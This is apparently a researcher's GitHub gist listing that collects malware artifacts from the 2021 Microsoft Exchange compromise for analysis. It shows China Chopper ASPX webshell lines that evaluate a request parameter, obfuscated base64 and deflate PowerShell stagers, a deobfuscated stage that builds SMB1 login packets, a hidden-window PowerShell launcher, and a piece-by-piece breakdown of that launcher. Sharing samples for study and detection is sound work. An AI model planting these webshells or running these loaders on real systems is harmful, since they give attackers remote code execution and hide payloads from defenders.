JohnHammond’s gists

JohnHammond / china_chopper_source.csv

Created March 5, 2021 18:44

Microsoft Exchange Incident "China Chopper" ASPX Webshell source

We can make this file beautiful and searchable if this error is corrected: Illegal quoting in line 2.

	# Occurrences, WebShell Source
	190, <script language="JScript" runat="server">function Page_Load(){eval(Request["NO9BxmCXw0JE"],"unsafe");}</script>
	50, <script language="JScript" runat="server">function Page_Load(){eval(Request["orange"],"unsafe");}</script>
	11, <script language="JScript" runat="server">function Page_Load(){eval(Request["bingo"],"unsafe");}</script>
	7, <script language="JScript" runat="server">function Page_Load(){eval(Request["error"],"unsafe");}</script>
	5, <script language="JScript" runat="server">function Page_Load(){eval(Request["Ananas"],"unsafe");}</script>
	1, <script language="JScript" runat="server">function Page_Load(){eval(Request["7gHQRih3fnam"],"unsafe");}</script>
	1, <script language="JScript" runat="server">function Page_Load(){eval(Request["coStWhkzUF7n"],"unsafe");}</script>
	1, <script language="JScript" runat="server">function Page_Load(){eval(Request["E9RyGFIM8h3S"],"unsafe");}</script>
	1, <script language="JScript" runat="server">function Page_Load(){eval(Request["EiH4yV2

JohnHammond / p.esonine.com_stager01.ps1

Created March 6, 2021 05:18

Microsoft Exchange Post-Exploitation

Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ivte0dbG8+P7vtsim6Wfp1kXe4re7z75MT17/5M+8zst82m5/Oflp+pFuv35brNLddPu8qJs23f2Z9KRaXuZ1+6yuFtsnzWW6/e08m+V1+sXxyc808m6l7+bvVtlyhm/u/MZJW1//4t84+bHfbZktcur248/LapKVv+/L16e/9+nJx/gmf5efl9kFffm70c8mp89e5FcGk9fXTZsvxm/mNfVH+I+/WLf5u3Trd2vrdT5isKPv1fn59w0c6vOXTLN2Ov/Fv+Q3Tn7j5HebtQT587zdfpq1ebr9rKoXWZt+fH39xRezGSHwu62ydk5NPvrd8uXlI+pr9fv+vtPpdFxWFx/9xomlmqLY5k27zW/we3g9rxcF+ki3vvc6n67ror0ev6SXpsUqK8ffLZaz6qqxH3x/Q6OzWb5s6ZvvP3pECJ+s65r+3rpzZ3zWnC1fVWW+qYcn66Jspdn304+OZ4tiWRDyWVvVHxFNfre3+TVGSXP+2UefgAk++egXZpf4PbukX2lym6Ja0t9bINZ3F4VhhROalCalXu7t/f5f0mizlggi03JnrK8RgEnR9l8eeOvL18f1dF601GRd5+kn6Ue/EPTd++wj+l1Ijc9m1SIrlvxhB+4Vw51WixVxQ90o2Kfcnl9dN3kt0DCrX70+ffXi+ItT/urla/1C+OU3TorzLelzO/9F6cfPsrLJP77zi5UNzwiyzHW63V6v8vS8KMGieEmmnpv+mPL5j/1

JohnHammond / p.estonine.com_stager02.ps1

Created March 6, 2021 05:21

Microsoft Exchange Post-Exploitation Artifacts 02

	[string]$mac = (getmac /FO CSV\|Select-Object -Skip 1 -first 1\| ConvertFrom-Csv -Header MAC\|select-object -expand MAC)
	try{
	$name = 'Global\PSEXEC'
	$exeflag = $flase
	New-Object System.Threading.Mutex ($true,$name,[ref]$exeflag)
	}catch{}

	$dt = Get-Date -Format 'yyMMdd'
	$path = "$env:temp\\ccc.log"
	[string]$flag = test-path $path

JohnHammond / 188.166.162.201_update.png.ps1

Created March 6, 2021 05:47

Microsoft Exchange Post-Exploitation Stager 03

This file has been truncated, but you can view the full file.

Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8i0q2trY9+8d7Og51fQv9++vCX/OL7n977Jb949+HuAf37AB/sfnqwRx/v0m979/Hpwf19+nd37wH9e+8Bfr//EO2oIQHZx+d7Ow+55R7B2tu7j08ePqR/9+/vMZhP0fweQN6/j9YH+2ixTx/f2wOoA3y8u7sD4Pce7uDfe3jz4QG62MGvDw7o9YOH6OAeUN57AJQPGO979/Diw08B+/4+Wu9+uo8v6YMHD/aAE+O9t4tP9zH2h/fw770H1OLeAY+Jh8GfPtz5FN/tE2Z7B7v8Isixt/8p4wRc7+2g408PQJNP76H5w/v06qeAvftgj4f3KX+8Q7g+fAgcuN2DByD3AQhLOOH3e3jn/qfUwT0M4P7eLndO/wLzfQznIbp/uA+ou59S630A2eOWB8CVSCsvAeruHn3ykGdiB8jvMZY04HsYO/Vw8Cn9/QBw97nVp5jBTxnnXfRxAFrt7e9SR/dADwIIAHsA8OkuxrDLY3gA0t//lIe2C0I8xL/3QdIDoL+3u8Nsgn8Jb559JtgeBnb/HpA9OMDgMdcPgMXBAWi2Q589uIeWuyDq7kOewp0dgvApyLl3IKQFczxk9j1gPPe510+ZJUC++/hqB1TavbfDfMe0BdX39h8QVg93gdp9JtvOfSB7nyXgITj7ocwRhIEEg5lo54D/Red74C1hjgd4/x7Itfspt4N0fMpcvMd4PWC+fgCZ293H7NAr6PhTxn0XuO4e7DDRMV6aWEa

JohnHammond / 188.166.162.201_update_stager.ps1

Created March 6, 2021 05:49

Microsoft Exchange Post-Exploitation Stager 04

This file has been truncated, but you can view the full file.

 ((("{2070}{2069}{563}{1918}{1769}{1682}{51}{1258}{1854}{1127}{1374}{1599}{1168}{2427}{2098}{1823}{2257}{2997}{452}{1256}{1131}{155}{2084}{2946}{329}{1855}{1104}{1390}{1332}{1988}{202}{1781}{893}{2363}{2718}{818}{1334}{1965}{2542}{1164}{815}{772}{2274}{1214}{840}{2930}{2375}{384}{157}{2030}{2906}{2349}{2814}{1251}{2462}{1955}{3018}{687}{1636}{2950}{640}{1724}{2966}{2903}{992}{2636}{773}{1858}{2743}{1340}{561}{365}{521}{2341}{72}{442}{951}{944}{2160}{473}{2521}{806}{1311}{2348}{2126}{923}{2014}{2687}{2933}{845}{867}{742}{423}{2627}{624}{2144}{874}{2410}{330}{1267}{2233}{616}{713}{1878}{1562}{2617}{1917}{575}{841}{2109}{1109}{2161}{1587}{1272}{538}{2880}{532}{727}{886}{200}{737}{1150}{1972}{2001}{603}{2866}{2988}{963}{1830}{1441}{2618}{11}{753}{1021}{1305}{2021}{243}{2479}{919}{2548}{2059}{1569}{1968}{958}{2782}{1762}{2208}{2206}{2215}{814}{1748}{310}{1662}{299}{690}{1230}{1704}{1770}{1426}{1749}{2663}{1111}{1804}{2450}{2529}{2555}{1564}{735}{3006}{1579}{2776}{1120}{2853}{1399}{1210}{2220}{2231}{1186}{2262}{189

JohnHammond / stage5_deobfuscated_188.166.162.201_update.png.ps1

Created March 6, 2021 07:03

Microsoft Exchange Post-Exploitation Artifacts stage #5

This file has been truncated, but you can view the full file.

	function make_smb1_anonymous_login_packet {
	[Byte[]] $pkt = [Byte[]] (0x00)
	$pkt += 0x00,0x00,0x48
	$pkt += 0xff,0x53,0x4D,0x42
	$pkt += 0x73
	$pkt += 0x00,0x00,0x00,0x00
	$pkt += 0x18
	$pkt += 0x01,0x48
	$pkt += 0x00,0x00
	$pkt += 0x00,0x00,0x00,0x00

JohnHammond / initial_foothold.bat

Last active January 6, 2023 19:40

	%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c if([IntPtr]
	::Size -eq 4){=:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{=
	'powershell.exe'};=New-Object System.Diagnostics.ProcessStartInfo;.FileName=;.Ar
	guments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamRe
	ader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]
	::FromBase64String(''H4sIAAb/EF0CA7VWa2+bSBT9nEj5D6iyBCjExombNpEqLdgmhhrHBD9iu9Y
	KwwBTj4HC4Jh0+9/3jg1pqqS77UqLbDGP+zz3zFz8PHIpjiMuu+1xX0+Oj4ZO6mw4oRa/u5C4GnZvxaM
	jWK49GhfcB05YKEnSiTcOjpbX1+08TVFED/P6DaJKlqHNimCUCSL3FzcNUYrOblefkUu5r1ztz/oNiVc
	OKcWKtuOGiDtTIo/t9WPXYaHU7YRgKvCfPvHi4qy5rHe/5A7JBN4uMoo2dY8QXuS+iczhqEiQwJvYTeM
	s9ml9iqOL8/o4yhwfDcDaFpmIhrGX8SIkAb8U0TyNOJYO0z/sCjwMh2nsKp6XoizjJW7BLC+Wyz+ERen

JohnHammond / powershell_architecture_check.ps1

Created May 3, 2021 23:06

	if ([IntPtr]::Size -eq 4) {
	$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'
	}else{
	$b='powershell.exe'
	};

JohnHammond / powershell_process_starter.ps1

Created May 3, 2021 23:07

	$s = New-Object System.Diagnostics.ProcessStartInfo;
	$s.FileName = $b;
	$s.Arguments='-noni -nop -w hidden -c

JohnHammond / powershell_data.ps1

Created May 3, 2021 23:08

	&([scriptblock]::create((
	New-Object IO.StreamReader(
	New-Object IO.Compression.GzipStream((
	New-Object IO.MemoryStream(,
	[Convert]::FromBase64String(
	''...BASE64GZIPDATA...''
	))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))

John Hammond JohnHammond